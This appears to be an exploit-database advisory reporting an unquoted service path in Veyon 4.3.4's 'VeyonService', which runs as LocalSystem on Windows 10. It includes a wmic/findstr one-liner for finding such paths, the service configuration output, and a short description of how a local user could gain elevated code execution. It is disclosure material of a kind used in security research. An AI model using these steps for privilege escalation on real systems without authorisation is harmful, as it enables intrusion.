# Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path# Discovery by: Víctor García# Discovery Date: 2020-03-23# Vendor Homepage: https://veyon.io/# Software Link:
https://github.com/veyon/veyon/releases/download/v4.3.4/veyon-4.3.4.0-win64-setup.exe
# Tested Version: 4.3.4# Vulnerability Type: Unquoted Service Path# Tested on: Windows 10 Pro x64# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "C:\Windows\\"|findstr /i /v """
Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe
# Service info:
C:\>sc qc VeyonService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeyonService
TYPE : 10WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe
LOAD_ORDER_GROUP :
TAG: 0
DISPLAY_NAME : Veyon Service
DEPENDENCIES : Tcpip
: RpcSs
SERVICE_START_NAME : LocalSystem
# Exploit:# A successful attempt would require the local user to be able to insert their code in the# system root path undetected by the OS or other security applications where it could# potentially be executed during application startup or reboot. If successful, the local# user's code would execute with the elevated privileges of the application.
